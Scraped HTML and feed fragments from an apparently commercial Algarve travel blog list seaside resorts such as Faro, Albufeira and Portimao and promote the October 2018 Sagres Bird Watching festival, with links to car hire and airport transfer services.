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<li><span style="color: #000000;"><span style="font-family: Arial, serif;">Transport in Portugal is quite an accessible aspect, so you can </span></span><a href="http://carhireinalgarve.com/" target="_blank" class="broken_link"><span style="color: #000000;"><span style="font-family: Arial, serif;"><b>rent a car in Algarve </b></span></span></a><span style="color: #000000;"><span style="font-family: Arial, serif;">or get </span></span><a href="http://www.low-cost-transfers.com/" target="_blank"><span style="color: #000000;"><span style="font-family: Arial, serif;"><b>Faro airport transfers</b></span></span></a><span style="color: #000000;"><span style="font-family: Arial, serif;"> at very accessible and fair rates, especially if you book online in advance and enjoy the promotions.</span></span></li>
<li><span style="color: #000000;"><span style="font-family: Arial, serif;">There are plenty of seaside resorts to choose from if the Algarve wins the place of best destination for you and your family or you and your group of friends.</span></span></li>
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<p><span style="color: #000000;"><span style="font-family: Arial, serif;">Here are some of those great options: </span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">Faro is the capital city of the Algarve. With a vibrant nightlife and cultural and economic activity, this can be a perfect choice if you want to spend a week at the seaside.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">Albufeira is more than a seaside resort, it is a place where you can both experience the authentic Portuguese life and enjoy golf and water sports.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">Portimao is a lovely seaside resort that can cater for all your travel needs.</span></span></p>
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		<title>Sagres Bird Watching and visiting in October 2018</title>
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		<description><![CDATA[If you are already ready for your low season vacation, we have a brilliant suggestion for you: Sagres Bird Watching and visiting in October 2018. What’s the occasion? The new edition of the Sagres Bird watching festival, which is bound to take place between 4 and 7 October. You might be wondering what that is]]></description>
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<p><span style="color: #000000;"><span style="font-family: Arial, serif;">If you are already ready for your low season vacation, we have a brilliant suggestion for you: Sagres Bird Watching and visiting in October 2018.<span id="more-2941"></span> </span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">What’s the occasion? The new edition of the Sagres Bird watching festival, which is bound to take place between 4 and 7 October. You might be wondering what that is and if a bird watching event is what is sounds or… and the answer is yes, year after year, bird lovers gather to this part of the lovely Algarve to watch migratory birds flying by in an exotic and wonderful dance. Trust the Portuguese to organize such a gentle and touching event, in honor of nature and the variety of life. </span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">The birds, including hawks, eagles, storks, vultures, falcons and owls, but also an amazing variety of seabirds, are making a last wonderful display before fleeing to the much warmer reams of Africa. A lot of photographers and biologists take a great interest in this event, so they are expected to come to the festival this year as well. They are the experts at work and on holiday here.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">But that’s not to say that if you are not necessarily an avid bird watcher or if you have never attended such an event you are less welcome to join the Sagres festival. Quite on the contrary, it’s pretty much “the more, the merrier”, so you can come and see if you like what you see.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">How to get to the festival venue? Just </span></span><span style="color: #000000;"><span style="font-family: Arial, serif;">book a<b> <a href="http://www.low-cost-transfers.com/" target="_blank">Faro Airport transfer </a></b></span></span><span style="color: #000000;"><span style="font-family: Arial, serif;">and the driver will take you there with no delay.</span></span></p>
<p><span style="color: #000000;"><span style="font-family: Arial, serif;">So what is in store for those who enjoy bird watching but also wish to try other activities? Experiences available include bird ringing, field and boat trips, exhibitions and activities meant to entertain kids, diving, paddle boating and surfing, but also dolphin watching and more relaxing activities, such as therapeutic sessions and long walks in nature.</span></span></p>
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